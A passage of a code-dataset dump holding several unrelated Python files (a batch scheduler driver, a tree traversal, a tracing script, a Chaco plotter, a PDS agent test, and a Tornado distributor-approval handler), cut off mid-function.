self.lock:\n inst = self.instance\n if inst:\n url = f'http://{inst.ip_address}:5000/api/v1alpha/pods/{self.name}/delete'\n try:\n await self._request('POST', url)\n log.info(f'deleted {self.name} from inst {inst}')\n except Exception:\n log.exception(f'failed to delete {self.name} on inst {inst} due to exception, ignoring')\n\n await self.unschedule()\n await self.driver.db.pods.delete_record(self.name)\n\n async def read_pod_logs(self):\n log.info(f'reading pod {self.name} logs from instance {self.instance}')\n\n if self.instance is None:\n return None\n\n inst = self.instance\n url = f'http://{inst.ip_address}:5000/api/v1alpha/pods/{self.name}/logs'\n resp = self._request('GET', url)\n return await resp.json()\n\n async def read_pod_status(self):\n log.info(f'reading status for pod {self.name} from instance {self.instance}')\n\n if self.instance is None:\n return None\n\n inst = self.instance\n url = f'http://{inst.ip_address}:5000/api/v1alpha/pods/{self.name}/status'\n resp = self._request('GET', url)\n return await resp.json()\n\n def status(self):\n if self._status is None:\n # don't know yet\n return {\n 'name': self.name,\n 'batch_id': self.batch_id,\n 'job_id': self.job_spec['job_id'],\n 'user': self.userdata['username'],\n 'state': 'pending'\n }\n return self._status\n\n def __str__(self):\n return self.name\n\n\nclass Driver:\n def __init__(self, db, k8s, batch_bucket, batch_gsa_key=None):\n self.db = db\n self.k8s = k8s\n self.batch_bucket = batch_bucket\n self.pods = None # populated in run\n self.complete_queue = asyncio.Queue()\n self.ready_queue = asyncio.Queue(maxsize=1000)\n self.ready = sortedcontainers.SortedSet(key=lambda pod: pod.cores_mcpu)\n self.ready_cores_mcpu = 0\n self.changed = asyncio.Event()\n\n self.pool = None # created in run\n\n deploy_config = get_deploy_config()\n\n self.base_url = deploy_config.base_url('batch2')\n\n self.inst_pool = InstancePool(self)\n\n if batch_gsa_key is None:\n batch_gsa_key = os.environ.get('BATCH_GSA_KEY', '/batch-gsa-key/privateKeyData')\n credentials = google.oauth2.service_account.Credentials.from_service_account_file(batch_gsa_key)\n\n self.gservices = GServices(self.inst_pool.machine_name_prefix, credentials)\n\n async def activate_worker(self, request):\n body = await request.json()\n inst_token = body['inst_token']\n ip_address = body['ip_address']\n\n inst = self.inst_pool.token_inst.get(inst_token)\n if not inst:\n log.warning(f'/activate_worker from unknown inst {inst_token}')\n raise web.HTTPNotFound()\n\n log.info(f'activating instance {inst}')\n await inst.activate(ip_address)\n inst.mark_as_healthy()\n return web.Response()\n\n async def deactivate_worker(self, request):\n body = await request.json()\n inst_token = body['inst_token']\n\n inst = self.inst_pool.token_inst.get(inst_token)\n if not inst:\n log.warning(f'/deactivate_worker from unknown instance {inst_token}')\n raise web.HTTPNotFound()\n\n log.info(f'received /deactivate_worker from instance {inst}')\n await inst.deactivate()\n inst.mark_as_healthy()\n return web.Response()\n\n async def pod_complete(self, request):\n body = await request.json()\n inst_token = body['inst_token']\n status = body['status']\n\n inst = self.inst_pool.token_inst.get(inst_token)\n if not inst:\n log.warning(f'pod_complete from unknown instance {inst_token}')\n raise web.HTTPNotFound()\n inst.mark_as_healthy()\n\n pod_name = status['name']\n pod = self.pods.get(pod_name)\n if pod is None:\n log.warning(f'pod_complete from unknown pod {pod_name}, instance {inst_token}')\n return web.HTTPNotFound()\n log.info(f'pod_complete from pod {pod_name}, instance {inst_token}')\n await pod.mark_complete(status)\n await self.complete_queue.put(status)\n return web.Response()\n\n async def create_pod(self, name, batch_id, job_spec, userdata, output_directory):\n assert name not in self.pods\n pod = await Pod.create_pod(self, name, batch_id, job_spec, userdata, output_directory)\n self.pods[name] = pod\n await pod.put_on_ready()\n\n async def delete_pod(self, name):\n pod = self.pods[name]\n pod.mark_deleted()\n await self.pool.call(pod.delete)\n # this must be after delete finishes successfully in case pod marks complete before delete call\n del self.pods[name]\n\n async def read_pod_logs(self, name):\n return await self.pods[name].read_pod_logs()\n\n async def read_pod_status(self, name):\n return await self.pods[name].read_pod_status()\n\n def list_pods(self):\n return [pod.status() for _, pod in self.pods.items()]\n\n async def schedule(self):\n log.info('scheduler started')\n\n self.changed.clear()\n should_wait = False\n while True:\n if should_wait:\n await self.changed.wait()\n self.changed.clear()\n\n while len(self.ready) < 50 and not self.ready_queue.empty():\n pod = self.ready_queue.get_nowait()\n if not pod.deleted:\n self.ready.add(pod)\n else:\n log.info(f'skipping pod {pod} from ready queue, already deleted')\n pod.remove_from_ready()\n\n should_wait = True\n if self.inst_pool.instances_by_free_cores and self.ready:\n inst = self.inst_pool.instances_by_free_cores[-1]\n i = self.ready.bisect_key_right(inst.free_cores_mcpu)\n if i > 0:\n pod = self.ready[i - 1]\n assert pod.cores_mcpu <= inst.free_cores_mcpu\n self.ready.remove(pod)\n should_wait = False\n scheduled = await pod.schedule(inst) # This cannot go in the pool!\n if scheduled:\n await self.pool.call(pod.create)\n\n async def initialize(self):\n await self.inst_pool.initialize()\n\n self.pool = AsyncWorkerPool(100)\n\n def _pod(record):\n pod = Pod.from_record(self, record)\n return pod.name, pod\n\n records = await self.db.pods.get_all_records()\n self.pods = dict(_pod(record) for record in records)\n\n async def put_all_on_ready():\n for pod in self.pods.values():\n if not pod.instance and not pod._status:\n await pod.put_on_ready()\n\n asyncio.ensure_future(put_all_on_ready())\n\n async def run(self):\n await self.inst_pool.start()\n await self.schedule()\n","sub_path":"batch2/batch/driver/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":15588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"147827331","text":"# In order travesal\r\n# Binary tree\r\nclass Node:\r\n\tdef __init__(self, val=0, left=None, right=None):\r\n\t\tself.val = val\r\n\t\tself.left = left\r\n\t\tself.right = right\r\n\t\t\r\ndef inorder(node):\r\n\tif node is None:\r\n\t\treturn\r\n\tinorder(node.left)\r\n\tprint(node.val)\r\n\tinorder(node.right)\r\n\r\nroot = Node(12)\r\nroot.left = Node(6)\r\nroot.right = Node(4)\r\n\r\ninorder(root)\r\n","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"89195258","text":"while True:\r\n first_num=input(\"First number for division (Enter q for quit): \")\r\n\r\n if first_num==\"q\":\r\n break\r\n\r\n second_num=input(\"Second number: \")\r\n\r\n try:\r\n num1=int(first_num)\r\n num2=int(second_num)\r\n print(num1,\"/\",num2,\"=\",num1/num2)\r\n except (ValueError,ZeroDivisionError):\r\n print(\"Error!\")\r\n print(\"Please try again!\")\r\n","sub_path":"en-US_iftryexc.py","file_name":"en-US_iftryexc.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"555699087","text":"#!/usr/bin/env python\n\"\"\"\ntracing utility\n\n\"\"\"\n# (c) Copyright 2019 Hewlett Packard Enterprise Development LP\n\n__author__ = \"Paul Carlton \"\n__copyright__ = \"Copyright (C) 2016 Paul Carlton\"\n__license__ = \"Public Domain\"\n__version__ = \"0.2\"\n__date__ = \"18 October 2016\"\n\nimport sys\nimport os\nimport logging\nimport configparser\n\nfrom prclib.tracelib import tracer\n\ncfg = configparser.ConfigParser()\n\nCLI_OPTS = [\n cfg.StrOpt('dir-path',\n deprecated_group=\"DEFAULT\",\n default='.',\n help='Directory to process.'),\n cfg.BoolOpt('flake-check',\n deprecated_group=\"DEFAULT\",\n default=False,\n help='Turn on flake8 checking of modified files, '\n 'defaults to off'),\n]\ncfg.CONF.register_cli_opts(CLI_OPTS)\n\n\nLOG = logging.getLogger(__name__)\n\nfrom prclib.traceutils import SetTracing\nPY_EXT = \".py\"\nblack_list = ['tracelib.py', 'LOG.py']\n\n\n@tracer.func_wrapper\ndef process_dirs(dir_path):\n\n @tracer.func_wrapper\n def process_file(filepath):\n if get_file_name(filepath) in black_list:\n LOG.info('Skipping black listed file: {0}', filepath)\n return\n if not file_path.endswith('.py'):\n LOG.info('Skipping non python file: {0}', filepath)\n return\n LOG.info('processing file: {0}', filepath)\n set_trace = SetTracing(filepath, cfg.CONF.flake_check)\n updated = set_trace.set_tracing()\n if not updated:\n LOG.info('File: {0} not updated', filepath)\n\n @tracer.func_wrapper\n def get_file_name(filepath):\n last_slash = filepath.rfind('/')\n if last_slash < 0:\n return filepath\n else:\n return filepath[last_slash + 1:]\n\n if not os.path.isdir(dir_path):\n LOG.warn('{0} is not a directory', dir_path)\n return\n for root, dirs, files in os.walk(dir_path):\n LOG.info('Directory: {0}', root)\n for filename in sorted(files):\n file_path = os.path.join(root, filename)\n try:\n process_file(file_path)\n except Exception as e:\n LOG.error('Failed to process file: {0}', file_path)\n LOG.error('Exception: {0}', str(e))\n\n\n@tracer.func_wrapper\ndef process(argv):\n\n logging.register_options(cfg.CONF)\n cfg.CONF(argv, project=\"trace\", prog=\"enabler\")\n logging.setup(cfg.CONF, 'trace')\n\n cfg.CONF.log_opt_values(LOG, logging.DEBUG)\n\n if cfg.CONF.dir_path:\n LOG.info(\"Base directory set by command line: {0}\", cfg.CONF.dir_path)\n walk_dir = cfg.CONF.dir_path\n else:\n walk_dir = \".\"\n LOG.info(\"Base directory defaulting to: {0}\",\n os.path.abspath(walk_dir))\n\n process_dirs(walk_dir)\n\n\n@tracer.func_wrapper\ndef main():\n process(sys.argv[1:])\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/enable_tracing.py","file_name":"enable_tracing.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"412624722","text":"\"\"\" ENAML VERSION\r\nImplement a Chaco data plotter that loads pandas data from an hdf5 file\r\nor directly from the object.\r\nThe plotter contains zoom, pan, and legend highlighter tools and preserve\r\nthe datetime tick labels.\r\n\r\nTODO list:\r\n- Catch the closing of the window and close the hdf file\r\n- Rethink the layout of the window.\r\n- Add more commonly used tools on these timeseries.\r\n- support netCDF and other self describing files in addition to HDF\r\n- Embed into a general application which contains the gsod_collect script to \r\nmake a end-to-end mini-application with an ipython prompt. Use envisage task (or \r\ncanopy?).\r\n\"\"\"\r\n\r\n# Major library imports\r\nimport os\r\nimport pandas\r\nimport numpy as np\r\n\r\n# Enthought imports\r\nfrom enable.api import ComponentEditor\r\nfrom traits.api import HasTraits, Instance, Dict, File, Bool, Enum, List, \\\r\n on_trait_change, Int, Str, Any\r\nfrom traitsui.api import View, Item, VGroup, HSplit\r\n\r\n# Chaco imports\r\nfrom chaco.api import ArrayPlotData, ToolbarPlot, PlotAxis\r\nfrom chaco.tools.api import PanTool, ZoomTool, LegendHighlighter, \\\r\n RangeSelection, RangeSelectionOverlay\r\n# for datetime tick labels\r\nfrom chaco.scales.api import CalendarScaleSystem\r\nfrom chaco.scales_tick_generator import ScalesTickGenerator\r\n\r\n# Use of Pandas in Chaco\r\nfrom chaco_pandas import pandas_hdf_to_data_dict, pandas2array_dict\r\n\r\ncolors = [\"black\", \"green\", \"red\", \"blue\", \"lightblue\", \"lightgreen\",\r\n \"pink\", \"yellow\", \"darkgray\", \"silver\"]\r\n\r\n# Tool names:\r\nCORRELATION = \"Correlation\"\r\nMA = \"Plot vs Moving averages\"\r\n\r\ndef attach_tools(plot):\r\n \"\"\" Little utility function to attach plot tools: zoom, pan and legend tools\r\n \"\"\"\r\n plot.tools.append(PanTool(plot))\r\n zoom = ZoomTool(component=plot, tool_mode=\"range\", axis = \"index\", always_on=False)\r\n plot.overlays.append(zoom)\r\n # Show legend\r\n plot.legend.visible = True\r\n plot.legend.align = \"lr\"\r\n # Legend Highlighter: allows to click on the line in the legend to show that one\r\n highlight_tool = LegendHighlighter(plot.legend)\r\n plot.tools.append(highlight_tool)\r\n\r\nclass GSODDataPlotterView(HasTraits):\r\n \"\"\" Application of the zoom tool to the GSOD plotting tool.\r\n Load a HDF file containing one or more timeseries and plot the entire data inside.\r\n The zoom tool allows to explore a subset of it. The legend allows to (de)select some\r\n timeseries.\r\n \"\"\"\r\n # UI controls\r\n data_file = File()\r\n\r\n # Tool controls\r\n tool_list = List([MA, CORRELATION])\r\n tool_chooser = Enum(values=\"tool_list\")\r\n ts_list = List()\r\n ts1_chooser = Enum(values=\"ts_list\")\r\n ts2_chooser = Enum(values=\"ts_list\")\r\n # Moving average window size (in number of observations)\r\n ma_window_size = Int(0) \r\n # Analysis details\r\n ts_analysis_details = Str(\"No details available\")\r\n \r\n # Data\r\n ts_data = Dict()\r\n arr_plot_data = Instance(ArrayPlotData, ())\r\n times_ds = Any() # arraydatasource for the time axis data\r\n index_is_dates = Bool()\r\n\r\n # Plots\r\n ts_plot = Instance(ToolbarPlot, ())\r\n ts_analysis_plot = Instance(ToolbarPlot, ())\r\n\r\n def trait_view(self, view):\r\n \"\"\" Build the view. The local namespace is \r\n \"\"\"\r\n return View(\r\n VGroup(Item('data_file', style='simple', label=\"HDF file to load\"), \r\n HSplit(Item('ts_plot', editor=ComponentEditor(size=(400, 600)), \r\n show_label=False),\r\n VGroup(Item('tool_chooser', show_label = True, label=\"Choose tool\"),\r\n Item('ts1_chooser', label=\"TS 1\"),\r\n Item('ts2_chooser', label=\"TS 2\",\r\n visible_when=\"tool_chooser in ['%s']\" % CORRELATION),\r\n Item('ma_window_size', label=\"MA window size\",\r\n visible_when=\"tool_chooser in ['%s']\" % MA),\r\n Item('ts_analysis_plot', editor=ComponentEditor(size=(400, 600)), \r\n show_label=False),\r\n Item('ts_analysis_details', show_label = False, style = 'readonly', \r\n visible_when=(\"tool_chooser in ['%s']\" % CORRELATION))),),\r\n ),\r\n title='Time-series plotter and analyzer',\r\n width=1300, height=800, resizable=True)\r\n\r\n def __init__(self, pandas_list = [], array_dict = {}, *args, **kw):\r\n \"\"\" If a (list of) pandas or a dict of arrays is passed, load them up. \r\n \"\"\"\r\n # Initialize the data content of the analysis tool\r\n ts_data = {}\r\n super(GSODDataPlotterView, self).__init__(*args, **kw)\r\n if not isinstance(pandas_list, list):\r\n pandas_list = [pandas_list]\r\n if pandas_list:\r\n array_dict_from_pandas, self.index_is_dates = pandas2array_dict(pandas_list)\r\n ts_data.update(array_dict_from_pandas)\r\n if array_dict:\r\n ts_data.update(array_dict)\r\n\r\n if ts_data:\r\n # Now trigger the plot redraw\r\n self.ts_data = ts_data \r\n \r\n\r\n def _data_file_changed(self):\r\n \"\"\" Update the data from the HDF5 file.\r\n \"\"\"\r\n ts_data, self.index_is_dates = pandas_hdf_to_data_dict(self.data_file)\r\n assert(\"index\" in ts_data)\r\n self.ts_data = ts_data\r\n\r\n def _ts_data_changed(self):\r\n \"\"\" Dataset has changed: update the plots.\r\n ENH: add the possibility to pass a dict to ArrayPlotData constructor.\r\n \"\"\"\r\n for k,v in self.ts_data.items():\r\n self.arr_plot_data.set_data(k,v)\r\n self.ts_list = self.ts_data.keys()\r\n self.update_main_plot()\r\n self.update_analysis_plot()\r\n \r\n def update_main_plot(self):\r\n \"\"\" Build main plot\r\n \"\"\"\r\n self.ts_plot = ToolbarPlot(self.arr_plot_data)\r\n for i, k in enumerate([k for k in self.ts_data.keys() if k != \"index\"]):\r\n renderer = self.ts_plot.plot((\"index\", k), name = k, color = colors[i % len(colors)])[0]\r\n if self.index_is_dates:\r\n # Index was an array of datetime: overwrite the x axis\r\n self.ts_plot.x_axis = None\r\n x_axis = PlotAxis(self.ts_plot, orientation=\"bottom\",\r\n tick_generator=ScalesTickGenerator(scale=CalendarScaleSystem()))\r\n self.ts_plot.overlays.append(x_axis)\r\n self.ts_plot.x_grid.tick_generator = x_axis.tick_generator\r\n \r\n if self.data_file:\r\n self.ts_plot.title = (\"Time series visualization from %s\" \r\n % (os.path.split(self.data_file)[1]))\r\n else:\r\n self.ts_plot.title = \"Time series visualization\"\r\n attach_tools(self.ts_plot)\r\n\r\n # Attach the range selection to the last renderer; any one will do\r\n self.ts_plot.tools.append(RangeSelection(renderer, left_button_selects = False,\r\n auto_handle_event = False))\r\n # Attach the corresponding overlay\r\n self._range_selection_overlay = RangeSelectionOverlay(renderer,\r\n metadata_name=\"selections\")\r\n self.ts_plot.overlays.append(self._range_selection_overlay)\r\n # Grab a reference to the Time axis datasource and add a listener to its\r\n # selections metadata\r\n self.times_ds = renderer.index\r\n self.times_ds.on_trait_change(self._selections_changed)\r\n\r\n def _selections_changed(self, event):\r\n \"\"\" Selection of a time range on the first plot will triger a redraw of \r\n the correlation plot if present.\r\n \"\"\"\r\n if self.tool_chooser != CORRELATION:\r\n return\r\n if not isinstance(event, dict) or \"selections\" not in event:\r\n return\r\n corr_index = self.corr_renderer.index\r\n selections = event[\"selections\"]\r\n if selections is None:\r\n corr_index.metadata.pop(\"selections\", None)\r\n return\r\n else:\r\n low, high = selections\r\n data = self.times_ds.get_data()\r\n low_ndx = data.searchsorted(low)\r\n high_ndx = data.searchsorted(high)\r\n corr_index.metadata[\"selections\"] = np.arange(low_ndx, high_ndx+1, 1, dtype=int)\r\n self.ts_analysis_plot.request_redraw()\r\n\r\n @on_trait_change(\"tool_chooser, ts1_chooser, ts2_chooser, ma_window_size\")\r\n def update_analysis_plot(self):\r\n \"\"\" Build analysis plot\r\n \"\"\"\r\n self.ts_analysis_plot = ToolbarPlot(self.arr_plot_data)\r\n if self.tool_chooser == CORRELATION:\r\n self.corr_renderer = self.ts_analysis_plot.plot((self.ts1_chooser, \r\n self.ts2_chooser), type = \"scatter\", color = \"blue\")[0]\r\n self.ts_analysis_plot.title = \"%s plotted against %s\" % (self.ts1_chooser, self.ts2_chooser)\r\n self.ts_analysis_plot.index_axis.title = self.ts1_chooser\r\n self.ts_analysis_plot.value_axis.title = self.ts2_chooser\r\n elif self.tool_chooser == MA and self.ma_window_size > 0:\r\n ts1_ma = pandas.rolling_mean(self.arr_plot_data.get_data(self.ts1_chooser),\r\n self.ma_window_size)\r\n self.arr_plot_data.set_data(\"ts1_ma\", ts1_ma)\r\n self.ts_analysis_plot.plot((\"index\", self.ts1_chooser), type = \"scatter\", color = \"blue\")\r\n self.ts_analysis_plot.plot((\"index\", \"ts1_ma\"), type = \"line\", color = \"blue\")\r\n \r\n @on_trait_change(\"tool_chooser, ts1_chooser, ts2_chooser\")\r\n def update_analysis_details(self):\r\n if self.tool_chooser == CORRELATION:\r\n # Compute the correlation coefficients between the chosen TS\r\n ts1 = pandas.Series(self.ts_data[self.ts1_chooser])\r\n ts2 = pandas.Series(self.ts_data[self.ts2_chooser])\r\n corr_coefs = ts1.corr(ts2), ts1.corr(ts2, method = 'spearman'), ts1.corr(ts2, method = 'kendall') \r\n self.ts_analysis_details = (\"Coefficients of correlation: Std = %5.3f, Spearman = %5.3f, Kendall = %5.3f.\" % corr_coefs)\r\n return \r\n \r\nif __name__ == \"__main__\":\r\n model = GSODDataPlotterView()\r\n import enaml\r\n with enaml.imports():\r\n from gsod_plot_view import StatsView\r\n view = StatsView(model=model)\r\n view.show()\r\n\r\n\r\n\r\n \r\n","sub_path":"data_analysis_with_python/run/Code/gsod_plot.py","file_name":"gsod_plot.py","file_ext":"py","file_size_in_byte":10451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"197769266","text":"import sys, os\nmyPath = os.path.dirname(os.path.abspath(__file__))\nsys.path.insert(0, myPath + '/../PDS/')\n\nfrom indy import did,wallet,crypto\nfrom pds_agent import PDS_agent\nimport pytest\nimport requests\nimport json\nimport asyncio\nimport base64\nimport datetime\nimport time\n\n@pytest.yield_fixture(scope='module')\ndef event_loop(request):\n loop = asyncio.get_event_loop_policy().new_event_loop()\n yield loop\n loop.close()\n\n@pytest.fixture(autouse=True, scope=\"module\")\nasync def server():\n import subprocess\n import time\n p1 = subprocess.Popen(['python3', 'PDS/pds.py'])\n p2 = subprocess.Popen(['python3', 'PDS/pds_admin.py'])\n time.sleep(5) #Otherwise the server is not ready when tests start\n '''\n Add a DID to PDS server wallet\n '''\n user = {\n 'wallet_config': json.dumps({'id': 'user_wallet',\"storage_config\":{\"path\":\"tests/indy_wallets\"}}),\n 'wallet_credentials': json.dumps({'key': 'user_wallet_key'}),\n 'did' : '4qk3Ab43ufPQVif4GAzLUW'\n }\n wallet_handle = await wallet.open_wallet(user['wallet_config'], user['wallet_credentials'])\n verkey = await did.key_for_local_did(wallet_handle, user['did'])\n nbf = time.mktime(datetime.datetime(2020, 6, 1, 00, 00).timetuple())\n exp = time.mktime(datetime.datetime(2020, 6, 1, 23, 59).timetuple()) \n payload = {'action':'add','did':user['did'], 'verkey': verkey, 'metadata':json.dumps({'aud': 'locker1.sofie-iot.eu','nbf':nbf, 'exp': exp})}\n response = requests.post(\"http://localhost:9002/\", data = payload).text\n response =json.loads(response)\n assert(response['code'] == 200)\n await wallet.close_wallet(wallet_handle)\n yield\n p1.kill()\n p2.kill()\n\n@pytest.mark.asyncio\nasync def test_valid_did():\n user = {\n 'wallet_config': json.dumps({'id': 'user_wallet',\"storage_config\":{\"path\":\"tests/indy_wallets\"}}),\n 'wallet_credentials': json.dumps({'key': 'user_wallet_key'}),\n 'did' : '4qk3Ab43ufPQVif4GAzLUW'\n }\n token = await PDS_agent.get_token_from_did(\"http://localhost:9001\", user['did'], \"locker1.sofie-iot.eu\", user['wallet_config'], user['wallet_credentials'])\n print(token)\n assert('token' != \"\")","sub_path":"tests/test_pds_agent.py","file_name":"test_pds_agent.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"578390001","text":"# -*- coding: utf-8 -*-\n'''\nBEGIN\najax请求 审核/驳回渠道商进件信息\n 必选参数:\n\n 可选参数:\n\n 成功:\n {\"code\": 200, \"msg\": \"成功\"}\n 失败:\n {\"code\": 406, \"msg\": \"失败\"}\nEND\n'''\nimport json\n\nfrom tornado import gen\nfrom tornado.httpclient import (\n AsyncHTTPClient,\n)\nfrom tornado.web import authenticated, asynchronous\n\nfrom uline.handlers.baseHandlers import BkAdminHandler\nfrom uline.public import common\nfrom uline.public import log\nfrom uline.public.constants import AUTH_STATUS, translate_payment_type, old_payment_relations, new_payment_relations\nfrom uline.settings import FEATURE_SWITCH\nfrom uline.settings import (\n WX_MCH_ID, WXPAY_KEY, APPID, WX_PUB_KEY, WX_PRIVATE_KEY, WX_ROOT_CA,\n WX_APP_MCH_ID, WXPAY_APP_KEY, WX_APP_APPID, WX_APP_PUB_KEY,\n WX_APP_PRIVATE_KEY, WX_APP_ROOT_CA,\n WX_0_WX_MCH_ID, WX_0_WXPAY_KEY, WX_0_APPID, BANK_NAME\n)\nfrom uline.utils.record import record_utils\nfrom uline.utils.wxpay.merchantInletToWxV2 import UpdateMerchantInletToWx\nfrom uline.utils.wxpay.query_wx import create_wx_mch\nfrom uline.utils.wxpay.util import xml_to_dict\nfrom .form import AuthDistributorInfo\nfrom uline.public import constants\nfrom uline.model.uline.user import Employee\nfrom uline.model.uline.info import UserProfile\nfrom uline.model.uline.base import uline_session\nfrom uline.public.permit import check_permission\n\n\nclass AuthDistributorInletStatusHandler(BkAdminHandler):\n\n @authenticated\n @check_permission\n def prepare(self):\n form = AuthDistributorInfo(self)\n if not form.validate():\n f_rsp = common.f_rsp(code=406, msg='fail')\n self.finish(f_rsp)\n self.dt_id = form.dt_id.data\n self.create_at = self.update_at = common.timestamp_now()\n\n self.open_review = FEATURE_SWITCH['REVIEW']\n if self.open_review:\n self.bk_email = self.auth_user_email(self.session.get('bk_id'))\n\n with self.db.get_db() as cur:\n ret = self.latest_status(cur)\n self.query_status, self.query_user = ret[0], ret[1]\n if self.query_status == 1:\n self.status = 4\n self.rsp = common.scc_rsp(code=200, msg='fsuccess')\n self.add_auth_inlet_info()\n self.auth_dt_inlet()\n self.finish(self.rsp)\n elif self.query_status == 4:\n self.status = 2\n self.rsp = common.scc_rsp(code=200, msg='csuccess')\n if self.query_user == self.bk_email:\n self.rsp = common.f_rsp(code=406, msg='fail')\n self.finish(self.rsp)\n else:\n self.rsp = common.f_rsp(code=406, msg='fail')\n self.finish(self.rsp)\n else:\n self.status = 2\n self.rsp = common.scc_rsp(code=200, msg='success')\n self.has_been_authed = self.has_authed()\n self.open_daily_cut = FEATURE_SWITCH.get('OPEN_DAILY_CUT', False) and self.has_been_authed\n\n @asynchronous\n @gen.coroutine\n def get(self):\n # print self.get_arguments()\n self.bk_email = yield self.get_bk_email()\n wx_reg_flag, wx_app_flag = True, True\n # wx_reg_pay = yield self.get_dt_wx_reg_payment()\n # wx_app_pay = yield self.get_dt_wx_app_payment()\n #\n # wx_id = yield self.get_dt_user_wx_id()\n # dt_inlet_info = yield self.get_dt_inlet_info()\n # 由于微信端渠道商进件有调整,不对其进行api进件,但保留原始信息\n wx_reg, wx_app = \"success\", \"success\"\n if not wx_reg_flag or not wx_app_flag:\n log.exception.info('进件到微信失败 wx_reg_flag:{}, wx_app_flag:{}'.format(\n wx_reg_flag, wx_app_flag))\n self.rsp = common.f_rsp(code=406, msg='进件到微信失败')\n\n comment_news = [wx_reg, wx_app]\n field = [\"微信支付进件:{}\", \"微信APP支付进件:{}\"]\n show_comment = \" \".join(_f.format(_com)\n for _f, _com in zip(field, comment_news) if _com != \"success\")\n\n yield self.add_fail_auth_inlet_info(show_comment)\n yield record_utils.rollback(self)\n\n self.status = 3\n yield self.auth_dt_inlet()\n else:\n yield self.update_dt_user()\n yield self.auth_dt_inlet()\n yield self.add_auth_inlet_info()\n self.invalid_past_record()\n yield self.update_changes()\n # if not self.has_been_authed:\n # self.activated_all_payment()\n\n self.update_dt_active_status()\n self.write(self.rsp)\n self.finish()\n\n @gen.coroutine\n def update_changes(self):\n cut_record = dict()\n # 检查这个商户是否有变更金额\n query_change_record_json = self.db.selectSQL(\n \"\"\"select data_json, id from change_record where status=1 and dt_id = %s;\"\"\",\n (self.dt_id,))\n employee = uline_session.query(Employee).filter(Employee.login_name == str(self.dt_id) + \".dt\").one()\n\n if self.status in [2, \"2\"]:\n uline_session.query(Employee).filter(Employee.id == employee.id).update({'status': 1})\n uline_session.query(UserProfile).filter(UserProfile.id == employee.user_id).update({'status': 1})\n uline_session.commit()\n # 验证数据的合法性\n if query_change_record_json:\n query_change_record = json.loads(query_change_record_json[0])\n if 'payment' in query_change_record:\n payments = query_change_record['payment']\n payment_cut_info = yield self.update_dt_payments(payments)\n if payment_cut_info:\n cut_record['payment'] = payment_cut_info\n\n if 'role' in query_change_record:\n role = query_change_record['role']\n if role:\n yield self.apply_d0_withdraw_fee(role)\n cut_record['withdraw'] = role\n # 账户信息修改\n if 'balance_info' in query_change_record:\n balance_update_info = query_change_record['balance_info']\n update_keys = ['balance_type', 'balance_name', 'bank_no', 'balance_account', 'id_card_no']\n change_balance_info = {key: balance_update_info[key] for key in update_keys if\n key in balance_update_info}\n change_balance_info['update_at'] = self.update_at\n self.update_balance_info(change_balance_info)\n\n need_update_keys = ['dt_name', 'province', 'city', 'address', 'contact', 'mobile', 'service_phone', 'email',\n 'id_card_img_f', 'id_card_img_b', 'dt_id', 'license_num', 'unionpay_id',\n 'license_start_date', 'license_end_date', 'license_period', 'license_scope',\n 'license_img', 'wx_channel_id', 'wx_app_channel_id', 'dt_type', 'u_ind_code',\n 'wx_ind_code', 'ali_ind_code', 'alipay_pid']\n change_inlet_info = {key: query_change_record[key] for key in need_update_keys if\n key in query_change_record}\n\n # 判断联系电话是否修改\n new_mobile = query_change_record.get('mobile')\n\n if new_mobile:\n # _password = common.bcrypt_pwd_new(str(self.get_dt_user_mobile()))\n result = yield self.auth_password(str(self.get_dt_user_mobile()))\n # 如果reesult为True,说明该渠道商还未登录,mobile已经被修改了\n if result:\n # 将密码修改为新的联系电话\n new_password = common.bcrypt_pwd_new(str(new_mobile))\n _query = \"\"\"update dt_user set password=%s where dt_id=%s;\"\"\"\n self.db.executeSQL(_query, (new_password, self.dt_id))\n uline_session.query(Employee).filter(Employee.login_name == str(self.dt_id) + \".dt\").update(\n {'login_passwd': new_password})\n\n if change_inlet_info:\n self.update_dt_user_email(change_inlet_info.get('email'))\n self.update_dt_inlet_info(change_inlet_info)\n change_record_status = constants.CHANGE_RECORD_STATUS_ACCEPT\n if cut_record and FEATURE_SWITCH.get('OPEN_DAILY_CUT'):\n change_record_status = constants.CHANGE_RECORD_STATUS_TO_CUT\n cut_record['change_record_id'] = query_change_record_json[1]\n cut_record['bk_id'] = self.current_user\n cut_record['bk_email'] = self.bk_email\n self.add_daily_cut_record(cut_record)\n query = \"\"\"update change_record set status = %s, create_at = now() where dt_id = %s and status=1;\"\"\"\n self.db.executeSQL(query, (change_record_status, self.dt_id,))\n\n _employee = {\"email\": \"email\", \"mobile\": \"phone1\", \"city\": \"city\", \"dt_name\": \"name\"}\n employee_update = {_employee[i]: change_inlet_info[i] for i in _employee.keys() if change_inlet_info.get(i)}\n if employee_update:\n uline_session.query(UserProfile).filter(UserProfile.id == employee.user_id).update(employee_update)\n uline_session.commit()\n\n def update_balance_info(self, change_balance_info):\n \"\"\"\n 更新结算账户信息\n :param cur: 数据库相关游标\n :param change_balance_info: dict,需要修改的信息\n \"\"\"\n sql = \"\"\"update dt_balance set \"\"\"\n update_colums = []\n params_values = []\n for key in change_balance_info:\n update_colums.append(\"\"\"{}=%s\"\"\".format(key))\n params_values.append(change_balance_info[key])\n sql = sql + ','.join(update_colums)\n where_str = \" where dt_id=%s;\"\n sql = sql + where_str\n params_values.append(self.dt_id)\n self.db.executeSQL(sql, tuple(params_values))\n\n def get_dt_user_mobile(self):\n ret = self.db.selectSQL(\n \"select mobile from dt_inlet_info where dt_id=%s\", (self.dt_id,))\n return ret[0]\n\n def update_dt_user_email(self, email):\n if email:\n sql = \"update dt_user set email = %s where dt_id = %s\"\n self.db.executeSQL(sql, (email, self.dt_id))\n\n @gen.coroutine\n def apply_d0_withdraw_fee(self, role):\n\n # 